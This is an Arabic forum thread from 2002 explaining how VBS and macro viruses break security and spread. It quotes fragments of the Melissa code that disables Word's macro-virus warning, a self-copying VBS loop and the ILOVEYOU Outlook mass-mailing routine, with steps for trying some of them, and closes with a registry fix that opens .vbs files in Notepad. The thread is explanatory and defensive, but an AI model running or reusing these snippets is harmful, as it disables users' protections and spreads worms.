New Page 1

العودة   .. :: منتدى تاروت الثقافي :: .. > المنتديات التقنية > منتدى الكمبيوتر والإنترنت

 
 
أدوات الموضوع انواع عرض الموضوع
قديم 13-07-02, 10:19 AM   #1

الغواص
عضو نشيط

 
الصورة الرمزية الغواص  







رايق

معصب فيروسات VBS خطيرة أحذروها


تنتشر هذه الفيروسات بأساليب معينة تزيد بزيادة مبتكريها وطرائقهم , مثل الرسائل المسلسلة Chain mail , المخطط الهرمى Pyramid scheme , الدودة Worm , حصان طروادة Trojan .
و نجيب فيما يلى على أهم سؤالين يسألهما المتعاملون مع الكمبيوتر بشأن هذه الفيروسات , وهما :

1 - كيف يكسر الفيروس جدار الأمان أو الحماية Security?
2 - كيف يتكاثر الفيروس وينشر نفسه بأعداد ضخمة على الشبكات



** كسر الأمان?

وبالنسبة لإجابة السؤال الأول فإن هناك طرق عديدة لذلك تقوم على استغلال بعض الثغرات الأمنية فى الأنظمة شائعة الاستخدام مثل مجموعة برامج Microsoft Office , ونرى الآن - عمليا - مثالا لذلك .

الجزء التالى من فيروس ميلسا Melissa الذى صممه ديفيد سميث , و ضرب الشبكة الإنترنت فى 26 /3/1999 وهذا الجزء يمكن تجربته من خلال أى نسخة من برامج Office 97 أو أحدث , وهو يوقف عمل رسالة التحذير عند فتح ملف يحتوى على ماكرو Macro .


** البرمجى Source code

On Error Resume Next

If System.PrivateProfileString (, HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Wo rd\Security, Level) <> Then

CommandBars(Macro).Controls(Security...).Enabled = False

System.PrivateProfileString(, HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Wo rd\Security, Level) = 1&

Else

'CommandBars(Tools).Controls(Macro).Enabled = False

Options.ConfirmConversions = (0): Options.VirusProtection = (0): Options.SaveNormalPrompt = (0)

End If

و تقوم هذه الشفرة Code بتغيير إعدادات Settings برنامج وورد لكيلا يلاحظ وجود الفيروس.

فتقوم اولا بفحص نسخة برنامج وورد Word تحت المسار التالى فى التسجيل -:Registry HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Wo rd\Security

لكى تتعرف على نسخة وورد المثبتة , ( لاحظ استخدام أمر On Error Resume Next لكى لا تظهر إحدى رسائل الخطأ فى حالة حدوثه , و ينتبه المستخدم لوجود شئ غير طبيعى ) .

وتعديل خيار حماية من فيروس الماكرو Options.VirusProtection بإعطائه القيمة (0) لكى يوقف فاعليته

ابدأ بفتح ملف جديد , ثم اذهب لقائمة أدوات ثم ماكرو ثم محرر Visual Basic وضع الشفرة السابقة فى الحدث Document_Open وقم بتشغيل الشفرة Run .

واحفظ الملف و أغلقه , ثم أعد فتحه مرة أخرى , و هذه المرة لن يظهر التحذير السابق.

لا تنس أخيرا أن تعيد التحذير بعد مسح الملف بالذهاب إلى قائمة أدوات فمنها إلى خيارات ثم اختيار الأمر عام .



** الانتشار
ينتشر الفيروس عن طريق نسخ نفسه أو كتابة نفسه كملف نصى جديد , والوسائل المتاحة لذلك محدودة , وجدير بالذكر أن شركة مايكروسوفت المصنعة قد أزالت الكثير من الدوال Functions فى VBS من أجل أمن النظام System Security , كدالة Kill (file name) الموجودة فى لغتى VB, VBA التى تستخدم فى مسح الملفات , كما أن VBS لا تكتب سوى الملفات النصية Textual التى تستخدم فى تحديد بعض المعلومات لمواقع الإنترنت من الأجهزة العميل Client , مثل ملفات كوكيز كلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةكلمة ممنوعةs الشائعة.

وفيما يلى طريقة لاستخدام أمر Copy, باشتقاق الكائن Object الخاص بنظام الملفات FileSystemObject , ثم استدعاء الأمر Copy ليقوم بنسخ الملف ذاته إلى مجلد خاص Special folder هو مجلد الملفات المؤقتة Temporary الذى غالبا ما يكون C:\Windows\Temp\


** النص البرمجى Source code

dim fso,c,dirtemp,x

Set fso = CreateObject(Scripting.FileSystemObject)

Set dirtemp = fso.GetSpecialFolder(2)

Set c = fso.GetFile(WScript.ScriptFullName)

c.Copy(dirtemp & \VBSdemo.vbs)

و يمكن استخدام أى أسلوب عادى مع الأمر Copy مثل الحلقة التكرارية Loop الآتية:

for x = 0 to 5

c.Copy(dirtemp & \VBSdemo & x & .vbs)

next

ولتجربة هذه الشفرة , انشئ ملفا نصيا بالامتداد VBS , و انسخ فيه هذه الشفرة , و سيقوم بترجمتها و تنفيذها برنامج Windows Scripting Host الذى يأتى مع الإعدادات القياسية لويندوز 98 أوإنترنت اكسبلورر 5.

** استغلال أوتلوك
تتمكن بعض الفيروسات من الاستفادة من برنامج أوتلوك Outlook لدعمه للغة VBS , ولذلك, فإن مستخدمى برامج البريد الإلكترونى التى لا تدعم VBS تكون أنظمتهم البريدية فى أمان.

كذلك الحال بالنسبة لمستخدمى خدمة البريد المبنية على الخادم Server-based email مثل بريد Hotmail و Yahoo و مكتوب .

ويتسلل الفيروس إلى قائمة العناوين البريدية المسجلة فى أوتلوك و يكتب رسالته الخاصة ويرفق في طيها نسخة منه على هيئة ملف VBS , ثم يرسلها لكل العناوين المتاحة, ليبدأ ملف VBS المرسل بدوره نفس الرحلة بعد وصوله مباشرة .

وفى الشفرة التالية من فيروس I love you سنرى بعضا من ذلك .


** النص البرمجى Source code

dim out,mal

set out=WScript.CreateObject(Outlook.Application)

set mal=out.CreateItem(0)

mal.Recipients.Add(malead)

mal.Subject = ILOVEYOU

mal.Body = vbcrlf & kindly check the attached LOVELETTER coming from me.

mal.Attachments.Add(dirsystem&\LOVE-LETTER-FOR-YOU.TXT.vbs)

mal.Send

تقوم هذه الشفرة من الفيروس باشتقاق نسخة من أوتلوك وتحم لها فى الذاكرة و تبدأ فى إعداد الرسالة بكتابة اسم المستلم من قائمة المتلقين Recipients وكتابة رأس الموضوع:I LOVE YOU والمحتوى الذى يطلب فتح الملف المرفق , ثم يضيف ملف VBS كملف ملحق Attachment باسم LOVE-LETTER-FOR-YOU.TXT.vbs , وأخيرا يرسل الرسالة .

الوقاية

لا توجد طريقة للوقاية تضمن نسبة نجاح 100 % , فالطرق الجديدة التى يبتكرها منتجو الفيروسات لا يمكن التنبؤ بها , والشركات المصنعة لمضادات الفيروسات Antivirus نفسها لا تتوقع كل هذه الطرق , و حتى لو صنعت أمصالها المضادة فى وقت يسير , فيكفى ساعات محدودة لانتشار هذه الفيروسات التى تتزايد بتتابع أسى exponential .

و على المستخدم إذا أن يكون حريصا فى التعامل مع ملفات VBS , و يمكن أيضا استخدام النص التالى فى تعديل (التسجيل) لكى يفتح هذه الملفات ويضع محتوياتها فى برنامج المفكرة NotePad , بدلا من تنفيذها مباشرة .

REGEDIT4

//

// Copyright c 2000 Steven John Mapua

// Freely distribute

//

[HKEY_CLASSES_ROOT\.VBS]

@=txtfile

Original_Default=VBSFile

احفظ النص عاليه فى ملف نصى و غير الامتداد إلى reg مثل vbsfix.reg و عند النقر على الملف سيقوم بالتعديل المطلوب ( ربما يسألك الموافقة على التعديل أولا )
=====

لنا لقاء

__________________

الغــــواص

الغواص غير متصل  

قديم 15-07-02, 09:54 AM   #2

wit
مبتدئ

 
الصورة الرمزية wit  






رايق

عجبني حبيبي غواص تعجبني

wit غير متصل  

قديم 20-07-02, 04:06 PM   #3

الغواص
عضو نشيط

 
الصورة الرمزية الغواص  







رايق

الله يسلمك حبيبي بعض مما عندكم
واسمح لي على التأخر في الرد
توني جاي من زيارة الرسول صلى الله عليه وآله
قلدناكم الدعاء والزيارة

__________________

الغــــواص

الغواص غير متصل  

قديم 20-07-02, 05:11 PM   #4

DIAMOND
...(عضو شرف)...  






رايق

حمدالله على السلامه يالغواص

DIAMOND غير متصل  

قديم 21-07-02, 01:42 AM   #5

الغواص
عضو نشيط

 
الصورة الرمزية الغواص  







رايق

الله يسلمك حبيبي
وودنا نشوف مشاركاتكم الحلوة ياحلو
وانشاء الله هالمنتدي بيصير حافل بالمعلومات القيمة لان فيه مجموعة من الشباباب اللي بصراحة عجبتني مشاركاتهم
لنا لقاء

__________________

الغــــواص

الغواص غير متصل  

 


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

قوانين وضوابط المنتدى
الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
علاقة القمر بقصة شعرك .. معلوووووومة خطيرة ... أنوار الأمل منتدى حواء والأسرة 17 28-05-08 05:49 PM
[ .. جولة مع أخطر 10 فيروسات تهدد الكمبيوتر .. ] شموع الامل منتدى الكمبيوتر والإنترنت 0 20-04-08 07:34 AM
هل اختفت فيروسات الكمبيوتر؟ فارس تاروت منتدى الكمبيوتر والإنترنت 0 08-09-02 05:21 AM
اخطر فيروسات حتى الان انشروا هذه القائمة الغواص منتدى الكمبيوتر والإنترنت 4 21-07-02 01:54 AM

توثيق المعلومة ونسبتها إلى مصدرها أمر ضروري لحفظ حقوق الآخرين
.:: جميع الحقوق محفوظة 2023 م ::.
جميع تواقيت المنتدى بتوقيت جزيرة تاروت 07:47 PM.


المواضيع المطروحة في المنتدى لا تعبر بالضرورة عن الرأي الرسمي للمنتدى بل تعبر عن رأي كاتبها ولا نتحمل أي مسؤولية قانونية حيال ذلك
 


Powered by: vBulletin Version 3.8.11
Copyright © 2013-2019 www.tarout.info
Jelsoft Enterprises Limited